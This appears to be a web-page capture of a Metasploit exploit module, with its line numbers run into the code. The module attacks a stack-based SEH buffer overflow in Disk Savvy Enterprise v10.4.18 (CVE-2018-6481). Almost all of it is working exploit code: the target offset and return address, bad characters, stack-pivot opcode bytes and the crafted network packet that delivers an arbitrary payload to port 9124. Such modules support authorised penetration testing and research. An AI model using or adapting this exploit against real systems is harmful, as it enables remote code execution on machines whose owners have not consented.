Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/misc/disk_savvy_adm.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'Disk Savvy Enterprise v10.4.18',14'Description' => %q{15This module exploits a stack-based buffer overflow vulnerability16in Disk Savvy Enterprise v10.4.18, caused by improper bounds17checking of the request sent to the built-in server. This module18has been tested successfully on Windows 7 SP1 x86.19},20'License' => MSF_LICENSE,21'Author' =>22[23'Daniel Teixeira'24],25'DefaultOptions' =>26{27'EXITFUNC' => 'thread'28},29'Platform' => 'win',30'Payload' =>31{32'BadChars' => "\x00\x02\x0a\x0d\xf8",33'Space' => 80034},35'Referencess' =>36[37[ 'CVE', '2018-6481' ]38],39'Targets' =>40[41[ 'Disk Savvy Enterprise v10.4.18',42{43'Offset' => 124,44'Ret' => 0x10056d1345}46]47],48'Privileged' => true,49'DisclosureDate' => '2017-01-31',50'DefaultTarget' => 0))5152register_options([Opt::RPORT(9124)])5354end5556def exploit57seh = generate_seh_record(target.ret)58connect5960buffer = make_nops(target['Offset'])61buffer << seh62buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh63buffer << "\x83\xc4\x21" #ADD esp,21h64buffer << "\xff\xe4" #JMP esp65buffer << payload.encoded66buffer << Rex::Text.rand_text_alphanumeric(1)6768header = "\x75\x19\xba\xab"69header << "\x03\x00\x00\x00"70header << "\x00\x40\x00\x00"71header << [buffer.length].pack("V")72header << [buffer.length].pack("V")73header << [buffer[-1].ord].pack("V")74packet = header75packet << buffer7677sock.put(packet)78handler79end80end818283